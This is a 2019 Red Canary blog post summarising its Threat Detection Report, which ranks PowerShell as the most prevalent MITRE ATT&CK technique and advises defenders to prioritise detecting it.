March 20, 2019 Detection and response
Brian Donohue

Getting Started with ATT&CK? New Report Suggests Prioritizing PowerShell

In a newly released report spanning nearly five years and examining some 10,000 confirmed threats, we revealed that PowerShell (T1086) is—by a wide margin—the most prevalent MITRE ATT&CK™ technique that we’ve observed. In fact, PowerShell is so prevalent among our threat detections that we’ve detected it more than twice as often as the next most prevalent ATT&CK technique in our dataset: Scripting (T1064).

Why Is PowerShell So Prevalent?

Like many other techniques highlighted in our report, PowerShell’s prominence is owed largely to its ubiquity and utility. Not only is the tool installed by default on nearly every Windows machine in the world, but systems administrators use it heavily in the normal course of their work. Furthermore, the availability of PowerShell’s source code has spurred the development of cross-platform, offensive tooling that attackers regularly use to deliver payloads in ways that are difficult to detect and prevent. In other words, PowerShell is available, effective, and elusive.

“Beyond the guarantee that it will be present on every Windows endpoint from Vista onward, PowerShell is a rich and elegant language,” explained Casey Smith, Red Canary director of applied research. “Adversaries can use it to harness the full .NET framework and Windows API without having to compile binaries. Furthermore, scripts are performant and easy to deliver. PowerShell fundamentally changed the way that many of us thought about offense and defense because it provided an easy way for adversaries to outpace defensive models that were stuck in thinking that attacks could only come through binaries.”

Luckily, the people that developed and maintain PowerShell are well aware of its notoriety among attackers, and they’ve done a commendable job building security controls around it.

“Microsoft has poured tremendous effort into increasing observability in PowerShell through its logging mechanisms,” Smith continued. “Also, using Constrained Language settings and signed script enforcement, defenders have a whole set of ways to defend against abuse that were simply not present in the early releases of PowerShell—arguably making it one of the most defensible scripting languages in the market.”

What Other Techniques Are Prevalent?

While PowerShell is the most prevalent ATT&CK technique that adversaries are leveraging in the environments we monitor, it is just one of the techniques analyzed in the 2019 Threat Detection Report. Each of the top ten techniques listed in the graphic below has its own dedicated analysis section in the report, containing, among other information, guidance that security teams can use to develop detection strategies.

More than half of the confirmed threats we analyzed for this report fall under just two ATT&CK tactics: execution and defense evasion. The prominence of techniques relating to defense evasion and execution is very much a reflection on the nature of our customer engagements and the closeness with which we monitor endpoint telemetry.

This is an important distinction to point out because the prevalence of certain ATT&CK tactics and techniques will vary depending on how you gather your data. For example, the MITRE ATT&CK team examined hundreds of publicly available threat intelligence reports and compiled their own prevalence rankings for a conference presentation back in January. Their list was distinctly different than ours, including a high number of discovery techniques and a fairly even distribution across other tactics beyond that.

The reason for this is probably because MITRE analyzed finished threat intelligence reports that consider entire attack campaigns in retrospect. Our data, on the other hand, is derived from continually monitoring endpoint telemetry in search of potentially malicious behaviors that are then investigated in context to determine malice. Therefore, the data examined for this report emerges almost entirely from behavioral rules that lead to human investigation, and not on the deeper context discovered in the actual course of an investigation. Similarly, if this report were compiled by a company that provides email monitoring services, you’d expect to find a high concentration of techniques that fall under the initial access tactic.

Since Red Canary monitors endpoint telemetry, the insights from our report are going to be most valuable to security teams that are looking to improve endpoint visibility and detection coverage.

How to Get Started with ATT&CK

We get a lot of questions about getting started with ATT&CK, and Red Canary’s 2019 Threat Detection Report is our comprehensive answer to those questions. As Kyle Rainey (one of the authors of this report) pointed out in a presentation at ATT&CKcon late last year, not all ATT&CK techniques are equal. And that’s exactly what this report demonstrates.

As such, if you’re a security team that’s just getting started with MITRE ATT&CK, or you’re trying to increase visibility or expand detection coverage, PowerShell is probably a good place to start. Purely from the detection and response perspective, our data suggests that security teams should prioritize building detection around specific uses of PowerShell, then focus on scripting, and then move sequentially through the rest of the techniques in our prevalence rankings. Furthermore, the tail end of the 2019 Threat Detection Report includes technique prevalence across 15 industry verticals, which should be useful for security teams seeking to improve detection based on threats targeted specifically toward organizations like their own. In essentially every case, these techniques are also particularly useful starting points for deeper investigation.

What’s Next?

We’ll be hosting a panel discussion on April 23 in which the report’s authors will be taking questions from the community. If you’re interested, you can register for the webinar below, and we encourage you to submit questions to us ahead of time, either via email or on Twitter.

We generate a massive trove of threat detection data in the normal course of our customer work, and we intend to reexamine that data on a regular basis to see what we can glean from it. While this year’s Threat Detection Report analyzed our entire body of threat data through the prism of MITRE ATT&CK, future iterations might look at how that data changes over time or take an entirely different approach. We welcome any and all input from the broader security community on how we can improve future versions of this report.

 

Using visibility to gather context and find persistence mechanisms

 

Advanced persistence threats: to be a cybercriminal, think like a sysadmin

 

It’s all fun and games until ransomware deletes the shadow copies

 

Black Hat: Detecting the unknown and disclosing a new attack technique